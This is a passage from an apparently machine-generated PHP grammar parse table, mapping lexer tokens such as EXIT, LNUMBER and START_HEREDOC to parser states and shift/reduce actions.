34,81,-85,81,517,-443,-443,-443,465,-109,465,-443,465,81,-65,-71,81,-36,-83,-443,-443,-92,-93,-86,-87,81,-61,81,81,-443,465,517,-123,81,-443,-35,-76,-443,81,-443,81,-88,-54,-108,465,517,210,465,-122,-429,81,-32,81,81,81,210,-63,-84,-443,-443,-77,81,-443,-126,-128,81,-52,81,-127,]),'EXIT':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,82,-3,-2,-4,-5,-6,82,-50,-443,82,82,82,82,82,-47,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,-443,82,82,-23,82,-48,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,-38,-40,-42,-443,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,-8,-443,82,-30,-22,-24,-25,-26,82,-11,-12,82,82,-39,-41,-43,-44,82,-45,-46,82,82,-56,82,82,82,82,82,82,82,82,-7,82,-9,82,82,-28,82,82,82,82,82,82,82,-443,82,82,82,82,82,82,82,-10,-29,-443,-443,82,82,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,82,82,82,-27,-443,-62,82,82,82,-51,-55,82,-110,82,82,-31,-64,82,-34,82,-85,82,-443,-443,-443,-109,82,-65,-71,82,-36,-83,-443,-443,-92,-93,-86,-87,82,-61,82,82,82,-443,-35,-76,-443,82,-443,82,-88,-54,-108,82,-32,82,82,82,-63,-84,-443,-443,-77,82,-443,82,-52,82,]),'DIE':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,83,-3,-2,-4,-5,-6,83,-50,-443,83,83,83,83,83,-47,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,-443,83,83,-23,83,-48,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,-38,-40,-42,-443,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,-8,-443,83,-30,-22,-24,-25,-26,83,-11,-12,83,83,-39,-41,-43,-44,83,-45,-46,83,83,-56,83,83,83,83,83,83,83,83,-7,83,-9,83,83,-28,83,83,83,83,83,83,83,-443,83,83,83,83,83,83,83,-10,-29,-443,-443,83,83,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,83,83,83,-27,-443,-62,83,83,83,-51,-55,83,-110,83,83,-31,-64,83,-34,83,-85,83,-443,-443,-443,-109,83,-65,-71,83,-36,-83,-443,-443,-92,-93,-86,-87,83,-61,83,83,83,-443,-35,-76,-443,83,-443,83,-88,-54,-108,83,-32,83,83,83,-63,-84,-443,-443,-77,83,-443,83,-52,83,]),'LNUMBER':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,294,295,304,336,345,346,347,348,351,352,354,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,455,456,457,468,477,479,485,487,488,489,490,500,501,503,528,532,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,613,614,616,617,620,621,622,630,634,636,637,638,639,640,646,657,679,682,693,703,734,735,740,741,742,746,748,759,762,763,764,771,773,776,803,806,811,813,814,820,822,825,826,832,835,836,839,841,851,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,894,907,908,909,910,911,912,913,914,915,917,918,924,928,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,88,-3,-2,-4,-5,-6,88,-50,-443,88,88,88,88,88,-47,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,-443,88,88,-23,88,-48,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,-38,-40,-42,-443,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,-8,-443,88,-30,-22,-24,-25,-26,88,-11,88,-12,88,88,-39,-41,-43,-44,88,-45,88,-46,88,88,-56,88,88,88,88,88,88,88,88,-7,88,-9,88,88,-28,88,88,88,88,88,88,88,88,88,88,88,-443,88,88,88,88,88,88,88,88,-10,-29,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,-443,-443,88,88,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,88,-111,88,88,88,-27,88,88,-443,-62,88,88,88,-51,-55,88,88,88,88,-110,88,88,-31,-64,88,-34,88,-85,88,-443,-443,-443,88,-109,88,88,88,-65,-71,88,-36,-83,-443,-443,-92,-93,-86,-87,88,-61,88,88,88,88,-443,-35,-76,-443,88,-443,88,-88,-54,-108,88,88,88,-32,88,88,88,-63,-84,-443,-443,-77,88,-443,88,-52,88,]),'DNUMBER':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,294,295,304,336,345,346,347,348,351,352,354,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,455,456,457,468,477,479,485,487,488,489,490,500,501,503,528,532,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,613,614,616,617,620,621,622,630,634,636,637,638,639,640,646,657,679,682,693,703,734,735,740,741,742,746,748,759,762,763,764,771,773,776,803,806,811,813,814,820,822,825,826,832,835,836,839,841,851,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,894,907,908,909,910,911,912,913,914,915,917,918,924,928,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,89,-3,-2,-4,-5,-6,89,-50,-443,89,89,89,89,89,-47,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,-443,89,89,-23,89,-48,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,-38,-40,-42,-443,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,-8,-443,89,-30,-22,-24,-25,-26,89,-11,89,-12,89,89,-39,-41,-43,-44,89,-45,89,-46,89,89,-56,89,89,89,89,89,89,89,89,-7,89,-9,89,89,-28,89,89,89,89,89,89,89,89,89,89,89,-443,89,89,89,89,89,89,89,89,-10,-29,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,-443,-443,89,89,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,89,-111,89,89,89,-27,89,89,-443,-62,89,89,89,-51,-55,89,89,89,89,-110,89,89,-31,-64,89,-34,89,-85,89,-443,-443,-443,89,-109,89,89,89,-65,-71,89,-36,-83,-443,-443,-92,-93,-86,-87,89,-61,89,89,89,89,-443,-35,-76,-443,89,-443,89,-88,-54,-108,89,89,89,-32,89,89,89,-63,-84,-443,-443,-77,89,-443,89,-52,89,]),'CONSTANT_ENCAPSED_STRING':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,35,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,294,295,304,336,345,346,347,348,351,352,354,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,452,455,456,457,468,477,479,485,487,488,489,490,500,501,503,528,532,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,613,614,616,617,620,621,622,630,634,636,637,638,639,640,646,657,679,682,693,703,734,735,740,741,742,746,748,759,762,763,764,771,773,776,803,806,811,813,814,820,822,825,826,832,835,836,839,841,851,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,894,907,908,909,910,911,912,913,914,915,917,918,924,928,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,90,-3,-2,-4,-5,-6,90,-50,-443,90,90,90,90,90,-47,90,187,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,-443,90,90,-23,90,-48,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,-38,-40,-42,-443,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,-8,-443,90,-30,-22,-24,-25,-26,90,-11,90,-12,90,90,-39,-41,-43,-44,90,-45,90,-46,90,90,-56,90,90,90,90,90,90,90,90,-7,90,-9,90,90,-28,187,90,90,90,90,90,90,90,90,90,90,90,-443,90,90,90,90,90,90,90,90,-10,-29,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,-443,-443,90,90,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,90,-111,90,90,90,-27,90,90,-443,-62,90,90,90,-51,-55,90,90,90,90,-110,90,90,-31,-64,90,-34,90,-85,90,-443,-443,-443,90,-109,90,90,90,-65,-71,90,-36,-83,-443,-443,-92,-93,-86,-87,90,-61,90,90,90,90,-443,-35,-76,-443,90,-443,90,-88,-54,-108,90,90,90,-32,90,90,90,-63,-84,-443,-443,-77,90,-443,90,-52,90,]),'LINE':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,294,295,304,336,345,346,347,348,351,352,354,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,455,456,457,468,477,479,485,487,488,489,490,500,501,503,528,532,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,613,614,616,617,620,621,622,630,634,636,637,638,639,640,646,657,679,682,693,703,734,735,740,741,742,746,748,759,762,763,764,771,773,776,803,806,811,813,814,820,822,825,826,832,835,836,839,841,851,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,894,907,908,909,910,911,912,913,914,915,917,918,924,928,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,91,-3,-2,-4,-5,-6,91,-50,-443,91,91,91,91,91,-47,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,-443,91,91,-23,91,-48,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,-38,-40,-42,-443,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,-8,-443,91,-30,-22,-24,-25,-26,91,-11,91,-12,91,91,-39,-41,-43,-44,91,-45,91,-46,91,91,-56,91,91,91,91,91,91,91,91,-7,91,-9,91,91,-28,91,91,91,91,91,91,91,91,91,91,91,-443,91,91,91,91,91,91,91,91,-10,-29,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,-443,-443,91,91,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,91,-111,91,91,91,-27,91,91,-443,-62,91,91,91,-51,-55,91,91,91,91,-110,91,91,-31,-64,91,-34,91,-85,91,-443,-443,-443,91,-109,91,91,91,-65,-71,91,-36,-83,-443,-443,-92,-93,-86,-87,91,-61,91,91,91,91,-443,-35,-76,-443,91,-443,91,-88,-54,-108,91,91,91,-32,91,91,91,-63,-84,-443,-443,-77,91,-443,91,-52,91,]),'FILE':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,294,295,304,336,345,346,347,348,351,352,354,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,455,456,457,468,477,479,485,487,488,489,490,500,501,503,528,532,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,613,614,616,617,620,621,622,630,634,636,637,638,639,640,646,657,679,682,693,703,734,735,740,741,742,746,748,759,762,763,764,771,773,776,803,806,811,813,814,820,822,825,826,832,835,836,839,841,851,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,894,907,908,909,910,911,912,913,914,915,917,918,924,928,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,92,-3,-2,-4,-5,-6,92,-50,-443,92,92,92,92,92,-47,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,-443,92,92,-23,92,-48,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,-38,-40,-42,-443,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,-8,-443,92,-30,-22,-24,-25,-26,92,-11,92,-12,92,92,-39,-41,-43,-44,92,-45,92,-46,92,92,-56,92,92,92,92,92,92,92,92,-7,92,-9,92,92,-28,92,92,92,92,92,92,92,92,92,92,92,-443,92,92,92,92,92,92,92,92,-10,-29,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,-443,-443,92,92,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,92,-111,92,92,92,-27,92,92,-443,-62,92,92,92,-51,-55,92,92,92,92,-110,92,92,-31,-64,92,-34,92,-85,92,-443,-443,-443,92,-109,92,92,92,-65,-71,92,-36,-83,-443,-443,-92,-93,-86,-87,92,-61,92,92,92,92,-443,-35,-76,-443,92,-443,92,-88,-54,-108,92,92,92,-32,92,92,92,-63,-84,-443,-443,-77,92,-443,92,-52,92,]),'DIR':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,294,295,304,336,345,346,347,348,351,352,354,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,455,456,457,468,477,479,485,487,488,489,490,500,501,503,528,532,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,613,614,616,617,620,621,622,630,634,636,637,638,639,640,646,657,679,682,693,703,734,735,740,741,742,746,748,759,762,763,764,771,773,776,803,806,811,813,814,820,822,825,826,832,835,836,839,841,851,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,894,907,908,909,910,911,912,913,914,915,917,918,924,928,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,93,-3,-2,-4,-5,-6,93,-50,-443,93,93,93,93,93,-47,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,-443,93,93,-23,93,-48,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,-38,-40,-42,-443,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,-8,-443,93,-30,-22,-24,-25,-26,93,-11,93,-12,93,93,-39,-41,-43,-44,93,-45,93,-46,93,93,-56,93,93,93,93,93,93,93,93,-7,93,-9,93,93,-28,93,93,93,93,93,93,93,93,93,93,93,-443,93,93,93,93,93,93,93,93,-10,-29,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,-443,-443,93,93,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,93,-111,93,93,93,-27,93,93,-443,-62,93,93,93,-51,-55,93,93,93,93,-110,93,93,-31,-64,93,-34,93,-85,93,-443,-443,-443,93,-109,93,93,93,-65,-71,93,-36,-83,-443,-443,-92,-93,-86,-87,93,-61,93,93,93,93,-443,-35,-76,-443,93,-443,93,-88,-54,-108,93,93,93,-32,93,93,93,-63,-84,-443,-443,-77,93,-443,93,-52,93,]),'CLASS_C':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,294,295,304,336,345,346,347,348,351,352,354,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,455,456,457,468,477,479,485,487,488,489,490,500,501,503,528,532,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,613,614,616,617,620,621,622,630,634,636,637,638,639,640,646,657,679,682,693,703,734,735,740,741,742,746,748,759,762,763,764,771,773,776,803,806,811,813,814,820,822,825,826,832,835,836,839,841,851,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,894,907,908,909,910,911,912,913,914,915,917,918,924,928,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,94,-3,-2,-4,-5,-6,94,-50,-443,94,94,94,94,94,-47,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,-443,94,94,-23,94,-48,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,-38,-40,-42,-443,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,-8,-443,94,-30,-22,-24,-25,-26,94,-11,94,-12,94,94,-39,-41,-43,-44,94,-45,94,-46,94,94,-56,94,94,94,94,94,94,94,94,-7,94,-9,94,94,-28,94,94,94,94,94,94,94,94,94,94,94,-443,94,94,94,94,94,94,94,94,-10,-29,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,-443,-443,94,94,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,94,-111,94,94,94,-27,94,94,-443,-62,94,94,94,-51,-55,94,94,94,94,-110,94,94,-31,-64,94,-34,94,-85,94,-443,-443,-443,94,-109,94,94,94,-65,-71,94,-36,-83,-443,-443,-92,-93,-86,-87,94,-61,94,94,94,94,-443,-35,-76,-443,94,-443,94,-88,-54,-108,94,94,94,-32,94,94,94,-63,-84,-443,-443,-77,94,-443,94,-52,94,]),'METHOD_C':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,294,295,304,336,345,346,347,348,351,352,354,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,455,456,457,468,477,479,485,487,488,489,490,500,501,503,528,532,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,613,614,616,617,620,621,622,630,634,636,637,638,639,640,646,657,679,682,693,703,734,735,740,741,742,746,748,759,762,763,764,771,773,776,803,806,811,813,814,820,822,825,826,832,835,836,839,841,851,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,894,907,908,909,910,911,912,913,914,915,917,918,924,928,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,95,-3,-2,-4,-5,-6,95,-50,-443,95,95,95,95,95,-47,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,-443,95,95,-23,95,-48,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,-38,-40,-42,-443,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,-8,-443,95,-30,-22,-24,-25,-26,95,-11,95,-12,95,95,-39,-41,-43,-44,95,-45,95,-46,95,95,-56,95,95,95,95,95,95,95,95,-7,95,-9,95,95,-28,95,95,95,95,95,95,95,95,95,95,95,-443,95,95,95,95,95,95,95,95,-10,-29,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,-443,-443,95,95,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,95,-111,95,95,95,-27,95,95,-443,-62,95,95,95,-51,-55,95,95,95,95,-110,95,95,-31,-64,95,-34,95,-85,95,-443,-443,-443,95,-109,95,95,95,-65,-71,95,-36,-83,-443,-443,-92,-93,-86,-87,95,-61,95,95,95,95,-443,-35,-76,-443,95,-443,95,-88,-54,-108,95,95,95,-32,95,95,95,-63,-84,-443,-443,-77,95,-443,95,-52,95,]),'FUNC_C':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,294,295,304,336,345,346,347,348,351,352,354,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,455,456,457,468,477,479,485,487,488,489,490,500,501,503,528,532,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,613,614,616,617,620,621,622,630,634,636,637,638,639,640,646,657,679,682,693,703,734,735,740,741,742,746,748,759,762,763,764,771,773,776,803,806,811,813,814,820,822,825,826,832,835,836,839,841,851,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,894,907,908,909,910,911,912,913,914,915,917,918,924,928,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,96,-3,-2,-4,-5,-6,96,-50,-443,96,96,96,96,96,-47,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,-443,96,96,-23,96,-48,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,-38,-40,-42,-443,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,-8,-443,96,-30,-22,-24,-25,-26,96,-11,96,-12,96,96,-39,-41,-43,-44,96,-45,96,-46,96,96,-56,96,96,96,96,96,96,96,96,-7,96,-9,96,96,-28,96,96,96,96,96,96,96,96,96,96,96,-443,96,96,96,96,96,96,96,96,-10,-29,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,-443,-443,96,96,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,96,-111,96,96,96,-27,96,96,-443,-62,96,96,96,-51,-55,96,96,96,96,-110,96,96,-31,-64,96,-34,96,-85,96,-443,-443,-443,96,-109,96,96,96,-65,-71,96,-36,-83,-443,-443,-92,-93,-86,-87,96,-61,96,96,96,96,-443,-35,-76,-443,96,-443,96,-88,-54,-108,96,96,96,-32,96,96,96,-63,-84,-443,-443,-77,96,-443,96,-52,96,]),'NS_C':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,294,295,304,336,345,346,347,348,351,352,354,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,455,456,457,468,477,479,485,487,488,489,490,500,501,503,528,532,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,613,614,616,617,620,621,622,630,634,636,637,638,639,640,646,657,679,682,693,703,734,735,740,741,742,746,748,759,762,763,764,771,773,776,803,806,811,813,814,820,822,825,826,832,835,836,839,841,851,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,894,907,908,909,910,911,912,913,914,915,917,918,924,928,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,97,-3,-2,-4,-5,-6,97,-50,-443,97,97,97,97,97,-47,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,-443,97,97,-23,97,-48,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,-38,-40,-42,-443,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,-8,-443,97,-30,-22,-24,-25,-26,97,-11,97,-12,97,97,-39,-41,-43,-44,97,-45,97,-46,97,97,-56,97,97,97,97,97,97,97,97,-7,97,-9,97,97,-28,97,97,97,97,97,97,97,97,97,97,97,-443,97,97,97,97,97,97,97,97,-10,-29,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,-443,-443,97,97,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,97,-111,97,97,97,-27,97,97,-443,-62,97,97,97,-51,-55,97,97,97,97,-110,97,97,-31,-64,97,-34,97,-85,97,-443,-443,-443,97,-109,97,97,97,-65,-71,97,-36,-83,-443,-443,-92,-93,-86,-87,97,-61,97,97,97,97,-443,-35,-76,-443,97,-443,97,-88,-54,-108,97,97,97,-32,97,97,97,-63,-84,-443,-443,-77,97,-443,97,-52,97,]),'START_HEREDOC':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,294,295,304,336,345,346,347,348,351,352,354,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,455,456,457,468,477,479,485,487,488,489,490,500,501,503,528,532,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,613,614,616,617,620,621,622,630,634,636,637,638,639,640,646,657,679,682,693,703,734,735,740,741,742,746,748,759,762,763,764,771,773,776,803,806,811,813,814,820,822,825,826,8